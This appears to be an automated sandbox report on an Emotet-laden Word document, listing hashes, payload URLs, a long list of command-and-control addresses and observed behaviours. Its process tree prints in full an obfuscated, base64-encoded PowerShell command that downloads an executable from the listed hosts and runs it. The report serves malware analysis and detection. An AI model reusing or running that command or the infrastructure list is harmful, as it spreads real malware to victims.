Analysis
-
max time kernel
29s -
max time network
30s -
platform
windows10_x64 -
resource
win10 -
submitted
27-10-2020 16:48
Static task
static1
General
-
Target
9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893.doc
-
Size
179KB
-
MD5
195b26f04a16b641bdcecc5084ca815d
-
SHA1
8b87e7f06c75a926103c28fd0b7b8fab532af1a4
-
SHA256
9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893
-
SHA512
54591f496f64ecbb54158c0c175a3499b4cd7fc346bef6a5439f31f783068dcefc4f626f0e11d72607817103fa9e6c9fb0e85ef4ce146cec491dcd3d0aed3236
Malware Config
Extracted
http://car4libya.com/cgi-bin/sDBhPqx/
http://ostranderandassociates.com/var/thpY/
http://acredales.com/thank_you/U0u9Z/
http://scw8.net/wp-content/1MkWc/
https://adinterix.com/laybuy-investors/9Ab6/
http://uxnew.com/old/9/
http://www.queensport.nl/accp/dz/
https://bahamianrelief.org/VpHo/ey/
Extracted
emotet
Epoch2
67.163.161.107:80
107.170.146.252:8080
173.212.214.235:7080
167.114.153.111:8080
185.94.252.104:443
110.142.236.207:80
194.187.133.160:443
218.147.193.146:80
172.104.97.173:8080
216.139.123.119:80
50.91.114.38:80
202.134.4.211:8080
113.61.66.94:80
139.99.158.11:443
62.171.142.179:8080
37.139.21.175:8080
190.108.228.27:443
94.23.237.171:443
154.91.33.137:443
201.241.127.190:80
37.179.204.33:80
110.145.77.103:80
72.186.136.247:443
78.24.219.147:8080
200.116.145.225:443
47.36.140.164:80
168.235.67.138:7080
61.76.222.210:80
121.124.124.40:7080
202.134.4.216:8080
190.164.104.62:80
61.19.246.238:443
61.33.119.226:443
98.174.164.72:80
121.7.31.214:80
190.162.215.233:80
24.179.13.119:80
68.252.26.78:80
142.112.10.95:20
220.245.198.194:80
138.68.87.218:443
203.153.216.189:7080
87.106.136.232:8080
95.9.5.93:80
91.146.156.228:80
104.131.11.150:443
5.39.91.110:7080
94.230.70.6:80
209.141.54.221:7080
62.75.141.82:80
172.105.13.66:443
120.150.60.189:80
66.76.12.94:8080
72.143.73.234:443
209.54.13.14:80
172.91.208.86:80
24.178.90.49:80
41.185.28.84:8080
176.113.52.6:443
50.245.107.73:443
176.111.60.55:8080
97.82.79.83:80
85.105.111.166:80
124.41.215.226:80
119.59.116.21:8080
194.4.58.192:7080
115.94.207.99:443
75.143.247.51:80
217.123.207.149:80
162.241.140.129:8080
104.131.123.136:443
50.35.17.13:80
59.125.219.109:443
118.83.154.64:443
37.187.72.193:8080
157.245.99.39:8080
174.106.122.139:80
186.70.56.94:443
186.74.215.34:80
24.230.141.169:80
46.105.131.79:8080
91.211.88.52:7080
172.86.188.251:8080
139.59.60.244:8080
109.74.5.95:8080
190.29.166.0:80
188.219.31.12:80
194.190.67.75:80
182.208.30.18:443
123.142.37.166:80
2.58.16.89:8080
62.30.7.67:443
75.188.96.231:80
123.176.25.234:80
108.46.29.236:80
89.121.205.18:80
78.188.106.53:443
76.175.162.101:80
95.213.236.64:8080
24.137.76.62:80
202.141.243.254:443
184.180.181.202:80
74.214.230.200:80
187.161.206.24:80
68.115.186.26:80
103.86.49.11:8080
190.240.194.77:443
120.150.218.241:443
79.137.83.50:443
49.50.209.131:80
173.63.222.65:80
134.209.144.106:443
112.185.64.233:80
27.114.9.93:80
87.106.139.101:8080
96.245.227.43:80
93.147.212.206:80
139.162.60.124:8080
102.182.93.220:80
89.216.122.92:80
137.59.187.107:8080
74.208.45.104:8080
71.15.245.148:8080
49.3.224.99:8080
94.200.114.161:80
217.20.166.178:7080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4332 2992 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/4068-11-0x00000000005A0000-0x00000000005C0000-memory.dmp emotet behavioral1/memory/4068-12-0x0000000000A30000-0x0000000000A4E000-memory.dmp emotet behavioral1/memory/4460-15-0x00000000005D0000-0x00000000005F0000-memory.dmp emotet behavioral1/memory/4460-16-0x0000000000900000-0x000000000091E000-memory.dmp emotet -
Blacklisted process makes network request 1 IoCs
Processes:
POwersheLL.exeflow pid process 22 4332 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
F1iv94s.exeactiveds.exepid process 4068 F1iv94s.exe 4460 activeds.exe -
Drops file in System32 directory 1 IoCs
Processes:
F1iv94s.exedescription ioc process File opened for modification C:\Windows\SysWOW64\KBDHAW\activeds.exe F1iv94s.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4756 WINWORD.EXE 4756 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POwersheLL.exeactiveds.exepid process 4332 POwersheLL.exe 4332 POwersheLL.exe 4332 POwersheLL.exe 4460 activeds.exe 4460 activeds.exe 4460 activeds.exe 4460 activeds.exe 4460 activeds.exe 4460 activeds.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 4332 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4756 WINWORD.EXE 4756 WINWORD.EXE 4756 WINWORD.EXE 4756 WINWORD.EXE 4756 WINWORD.EXE 4756 WINWORD.EXE 4756 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
F1iv94s.exedescription pid process target process PID 4068 wrote to memory of 4460 4068 F1iv94s.exe activeds.exe PID 4068 wrote to memory of 4460 4068 F1iv94s.exe activeds.exe PID 4068 wrote to memory of 4460 4068 F1iv94s.exe activeds.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD IAAgAFMAZQBUAC0ASQBUAGUATQAgAFYAYQByAEkAQQBiAEwARQA6AE0AQgBPAE4AOAA5ACAAIAAoACAAWwBUAHkAUABlAF0AKAAiAHsAMAB9AHsANAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACcAcwAnACwAJwAuAEQASQByACcALAAnAGUAYwBUAG8AUgB5ACcALAAnAGkATwAnACwAJwB5AHMAdABlAG0ALgAnACkAKQA7ACQAYQA0AGcAZQBLACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADAAfQB7ADYAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADMAfQB7ADIAfQB7ADEAfQB7ADUAfQAiAC0AZgAgACcAcwBZACcALAAnAEkATgBUAG0AQQBOAEEAZwBlACcALAAnAFAATwAnACwAJwBjAEUAJwAsACcAbgBFAFQAJwAsACcAUgAnACwAJwBzAHQAZQAnACwAJwBtAC4AJwAsACcALgBTAGUAcgBWAEkAJwApADsAJABUAHUAegAzAHEANAA2AD0AKAAoACcARwA3ACcAKwAnAGQAJwApACsAKAAnADUAJwArACcAbwAxAG4AJwApACkAOwAkAEcAXwBqAHUAXwAxAGwAPQAkAEEAcgB4AGoAYQA5AHEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUANgB0ADEAdQBzAGsAOwAkAE4AZQA1AHEAYgB0ADMAPQAoACgAJwBEAHQAJwArACcANgAnACkAKwAoACcAagBvACcAKwAnADEAJwApACsAJwB4ACcAKQA7ACAAKAB2AGEAcgBJAEEAYgBsAEUAIAAgAE0AQgBPAE4AOAA5ACAAIAAtAFYAQQBsAFUARQBvAG4ATAApADoAOgAiAEMAYABSAEUAYQBUAEUAYABEAGkAcgBFAGAAYwBUAG8AYABSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEQAWAAnACsAJwAxACcAKwAnAE4AXwBqACcAKQArACgAJwBkAGUAJwArACcAcwAnACkAKwAoACcAdQAnACsAJwBEAFgAMQBOADYAcQAnACsAJwB3ADAAJwArACcAegAnACkAKwAoACcAcgBEACcAKwAnAFgAJwApACsAJwAxACcAKQAuACIAcgBlAFAAYABMAGEAYABjAGUAIgAoACgAJwBEAFgAJwArACcAMQAnACkALAAnAFwAJwApACkAKQA7ACQATQAwAHYAcwBjAGgAZQA9ACgAJwBDACcAKwAoACcAaQB4AHcAJwArACcAawAnACkAKwAnAGUAZwAnACkAOwAgACgAIAAgAEMAaABpAEwARABJAFQAZQBNACAAIAB2AEEAcgBJAEEAYgBsAEUAOgBBADQAZwBFAEsAKQAuAHYAYQBMAFUARQA6ADoAIgBzAGAAZQBDAHUAcgBgAEkAdABZAFAAUgBPAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABQAHUAbABqADcAOQBxAD0AKAAnAFMAJwArACgAJwA4AGUAcwBjAGgAJwArACcAYwAnACkAKQA7ACQARgBsAHoAZwBqAGoAYgAgAD0AIAAoACgAJwBGADEAJwArACcAaQB2ACcAKQArACgAJwA5ADQAJwArACcAcwAnACkAKQA7ACQAQQBhAG4ANQA4AGcAcQA9ACgAKAAnAEkAZQAnACsAJwB5ADYAJwApACsAKAAnAHAAbwAnACsAJwA5ACcAKQApADsAJABOAGQANABmAGMAdwAyAD0AKAAoACcARABnAG8AdQAnACsAJwA4ACcAKQArACcAdwAnACsAJwA0ACcAKQA7ACQAUwBtAGUAbQA1AHkAagA9ACQASABPAE0ARQArACgAKAAoACcAYwBTACcAKwAnAGsAJwApACsAJwBOAF8AJwArACgAJwBqAGQAJwArACcAZQAnACkAKwAnAHMAJwArACgAJwB1ACcAKwAnAGMAUwBrACcAKwAnAE4ANgBxAHcAJwApACsAKAAnADAAegAnACsAJwByACcAKwAnAGMAUwBrACcAKQApACAALQBSAEUAUABsAGEAQwBlACAAIAAoAFsAQwBIAGEAcgBdADkAOQArAFsAQwBIAGEAcgBdADgAMwArAFsAQwBIAGEAcgBdADEAMAA3ACkALABbAEMASABhAHIAXQA5ADIAKQArACQARgBsAHoAZwBqAGoAYgArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEIAXwBqADcAdQB4AHYAPQAoACcATAAnACsAKAAnAGUAJwArACcAZgAwACcAKQArACgAJwB0AGkAJwArACcAYQAnACkAKQA7ACQATwBuAG8AXwBxAGkANQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQAUgAzAGkAeQA4AHgANgA9ACgAJwBoACcAKwAnAHQAJwArACgAJwB0ACcAKwAnAHAAOgBbACcAKwAnACAAdwBlACAAXQAnACkAKwAoACcAWwAgAHcAJwArACcAZQAnACkAKwAoACcAIABdAGMAYQAnACsAJwByACcAKQArACgAJwA0AGwAaQBiACcAKwAnAHkAYQAnACkAKwAoACcALgAnACsAJwBjAG8AbQBbACAAJwApACsAJwB3ACcAKwAoACcAZQAnACsAJwAgACcAKwAnAF0AJwArACcAYwBnAGkALQBiAGkAbgAnACkAKwAoACcAWwAnACsAJwAgACcAKwAnAHcAZQAgAF0AcwBEAEIAJwApACsAKAAnAGgAJwArACcAUABxACcAKQArACcAeABbACcAKwAoACcAIAAnACsAJwB3AGUAJwApACsAJwAgACcAKwAnAF0AJwArACgAJwBAACcAKwAnAGgAdAB0ACcAKQArACgAJwBwADoAWwAnACsAJwAgACcAKQArACcAdwAnACsAKAAnAGUAIABdAFsAIAB3AGUAJwArACcAIABdACcAKQArACgAJwBvAHMAJwArACcAdAByAGEAJwApACsAJwBuACcAKwAoACcAZABlAHIAJwArACcAYQBuAGQAJwArACcAYQAnACkAKwAoACcAcwBzACcAKwAnAG8AYwAnACsAJwBpAGEAdAAnACsAJwBlAHMAJwApACsAKAAnAC4AYwBvAG0AWwAgAHcAJwArACcAZQAgACcAKwAnAF0AJwApACsAKAAnAHYAYQAnACsAJwByACcAKQArACgAJwBbACAAJwArACcAdwAnACkAKwAoACcAZQAgAF0AdAAnACsAJwBoAHAAWQBbACcAKQArACcAIAB3ACcAKwAoACcAZQAgAF0AJwArACcAQABoACcAKwAnAHQAdABwADoAJwArACcAWwAgACcAKwAnAHcAZQAgAF0AWwAgACcAKQArACgAJwB3AGUAJwArACcAIABdAGEAYwAnACsAJwByAGUAZABhACcAKwAnAGwAZQAnACkAKwAnAHMAJwArACgAJwAuACcAKwAnAGMAbwBtAFsAJwApACsAKAAnACAAdwBlACAAXQAnACsAJwB0ACcAKwAnAGgAJwApACsAJwBhACcAKwAoACcAbgBrACcAKwAnAF8AJwApACsAKAAnAHkAbwAnACsAJwB1ACcAKQArACgAJwBbACcAKwAnACAAdwBlACAAJwApACsAKAAnAF0AVQAnACsAJwAwACcAKQArACgAJwB1ACcAKwAnADkAWgAnACsAJwBbACAAdwBlACcAKwAnACAAXQBAAGgAdAAnACsAJwB0AHAAOgBbACAAdwBlACcAKQArACgAJwAgAF0AWwAgACcAKwAnAHcAJwArACcAZQAgAF0AJwApACsAJwBzACcAKwAnAGMAJwArACgAJwB3ACcAKwAnADgALgBuAGUAdAAnACkAKwAoACcAWwAgAHcAJwArACcAZQAnACkAKwAnACAAXQAnACsAKAAnAHcAcAAtACcAKwAnAGMAbwBuAHQAZQBuACcAKwAnAHQAWwAgAHcAZQAgACcAKQArACgAJwBdADEATQBrACcAKwAnAFcAJwApACsAKAAnAGMAJwArACcAWwAnACsAJwAgAHcAZQAgAF0AQABoACcAKQArACgAJwB0ACcAKwAnAHQAcABzACcAKQArACcAOgBbACcAKwAnACAAJwArACgAJwB3AGUAJwArACcAIABdACcAKQArACcAWwAnACsAJwAgACcAKwAoACcAdwBlACcAKwAnACAAXQBhAGQAaQAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAcgBpAHgALgAnACkAKwAoACcAYwBvAG0AWwAgACcAKwAnAHcAJwArACcAZQAnACkAKwAnACAAXQAnACsAKAAnAGwAYQB5ACcAKwAnAGIAdQB5ACcAKwAnAC0AaQBuAHYAJwApACsAKAAnAGUAcwAnACsAJwB0ACcAKwAnAG8AcgBzAFsAJwArACcAIAB3AGUAIABdACcAKwAnADkAQQBiADYAWwAgAHcAJwApACsAKAAnAGUAIABdAEAAaAB0ACcAKwAnAHQAcAAnACsAJwA6AFsAJwArACcAIAAnACkAKwAoACcAdwAnACsAJwBlACAAJwApACsAJwBdACcAKwAoACcAWwAgAHcAZQAgAF0AdQAnACsAJwB4ACcAKwAnAG4AJwApACsAJwBlAHcAJwArACcALgBjACcAKwAoACcAbwAnACsAJwBtAFsAIAB3ACcAKwAnAGUAIABdAG8AJwApACsAKAAnAGwAZABbACAAJwArACcAdwAnACkAKwAoACcAZQAgACcAKwAnAF0AOQBbACcAKQArACcAIAB3ACcAKwAnAGUAJwArACgAJwAgACcAKwAnAF0AQAAnACkAKwAnAGgAdAAnACsAJwB0ACcAKwAoACcAcAA6AFsAJwArACcAIAAnACsAJwB3AGUAIABdACcAKwAnAFsAJwApACsAKAAnACAAdwBlACcAKwAnACAAXQB3AHcAJwApACsAKAAnAHcALgAnACsAJwBxACcAKQArACgAJwB1AGUAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwBzAHAAbwByAHQALgBuACcAKwAnAGwAWwAgAHcAJwArACcAZQAnACsAJwAgAF0AYQAnACsAJwBjAGMAJwApACsAKAAnAHAAWwAgACcAKwAnAHcAZQAnACkAKwAoACcAIABdAGQAegAnACsAJwBbACAAdwAnACsAJwBlACcAKwAnACAAXQAnACsAJwBAAGgAdAAnACsAJwB0AHAAcwA6ACcAKQArACgAJwBbACcAKwAnACAAdwBlACcAKQArACgAJwAgAF0AJwArACcAWwAgAHcAJwArACcAZQAgAF0AYgBhACcAKQArACgAJwBoACcAKwAnAGEAbQAnACkAKwAoACcAaQBhAG4AJwArACcAcgBlACcAKwAnAGwAaQBlAGYAJwApACsAJwAuAG8AJwArACgAJwByAGcAWwAnACsAJwAgAHcAJwArACcAZQAgAF0AJwApACsAKAAnAFYAJwArACcAcAAnACsAJwBIAG8AWwAgAHcAZQAgACcAKwAnAF0AZQB5AFsAIAAnACkAKwAoACcAdwAnACsAJwBlACAAXQAnACkAKQAuACIAcgBgAGUAYABQAGwAYQBDAGUAIgAoACgAJwBbACAAJwArACcAdwBlACcAKwAnACAAXQAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAJwBmAHMAJwApAFsAMABdACkALgAiAFMAYABQAEwAaQB0ACIAKAAkAFUAeQBjADYAXwBtAGoAIAArACAAJABHAF8AagB1AF8AMQBsACAAKwAgACQASABxAHkAMQAzADgAZQApADsAJABJADcANABxAGYAYgBhAD0AKAAoACcATQBrACcAKwAnAHoAMAByACcAKQArACcAMwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQASwAzAGQAeABzAG0ANQAgAGkAbgAgACQAUgAzAGkAeQA4AHgANgApAHsAdAByAHkAewAkAE8AbgBvAF8AcQBpADUALgAiAGQAbwB3AGAATgBsAE8AQQBEAGAARgBJAEwARQAiACgAJABLADMAZAB4AHMAbQA1ACwAIAAkAFMAbQBlAG0ANQB5AGoAKQA7ACQARQB1ADIAaQB1ADAANAA9ACgAJwBTADYAJwArACgAJwB3AGQAJwArACcAMAA3ADIAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQAUwBtAGUAbQA1AHkAagApAC4AIgBMAEUAbgBgAGcAdABoACIAIAAtAGcAZQAgADQAMAA5ADcAMwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAaQAnACsAKAAnAG4AMwAyAF8AJwArACcAUAAnACkAKwAoACcAcgBvACcAKwAnAGMAZQAnACkAKwAnAHMAcwAnACkAKQAuACIAQwBSAGAAZQBgAEEAVABlACIAKAAkAFMAbQBlAG0ANQB5AGoAKQA7ACQASwB4AHkAcQB2AHoAMwA9ACgAKAAnAEUAbQAnACsAJwAxACcAKQArACcAeABsACcAKwAnADkAcwAnACkAOwBiAHIAZQBhAGsAOwAkAFQAdQBoAGYANwBoAG4APQAoACcAQgAnACsAKAAnADIAJwArACcAawBwACcAKQArACgAJwA4ACcAKwAnADkAeAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAAwAGMAZgB6AHIAdgA9ACgAJwBaAHYAJwArACgAJwBuAHcAZAAnACsAJwBjAG8AJwApACkA1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exeC:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\KBDHAW\activeds.exe"C:\Windows\SysWOW64\KBDHAW\activeds.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exeMD5
44159153fabe28642e068351999c5573
SHA1725f004ce99979aa808fa1bfd1d33d0b84146780
SHA256e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62
SHA5128f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9
-
C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exeMD5
44159153fabe28642e068351999c5573
SHA1725f004ce99979aa808fa1bfd1d33d0b84146780
SHA256e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62
SHA5128f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9
-
C:\Windows\SysWOW64\KBDHAW\activeds.exeMD5
44159153fabe28642e068351999c5573
SHA1725f004ce99979aa808fa1bfd1d33d0b84146780
SHA256e3fa57c5e24d254e1f737f20f3ce2f2df786f427d74b6a08b7d86c47f0116a62
SHA5128f792696af4d74c5213a51086501abaea7d16d91f800b44ac0fe333012a998e74221b2de3f9a4f39686d4740d853b497293a85b8aef540e51c06355c2d8cdaa9
-
memory/4068-11-0x00000000005A0000-0x00000000005C0000-memory.dmpFilesize
128KB
-
memory/4068-12-0x0000000000A30000-0x0000000000A4E000-memory.dmpFilesize
120KB
-
memory/4332-6-0x00007FFE87170000-0x00007FFE87B5C000-memory.dmpFilesize
9.9MB
-
memory/4332-7-0x000001C65B490000-0x000001C65B491000-memory.dmpFilesize
4KB
-
memory/4332-8-0x000001C65B680000-0x000001C65B681000-memory.dmpFilesize
4KB
-
memory/4460-13-0x0000000000000000-mapping.dmp
-
memory/4460-15-0x00000000005D0000-0x00000000005F0000-memory.dmpFilesize
128KB
-
memory/4460-16-0x0000000000900000-0x000000000091E000-memory.dmpFilesize
120KB
-
memory/4756-0-0x00007FFE8E7D0000-0x00007FFE8EE07000-memory.dmpFilesize
6.2MB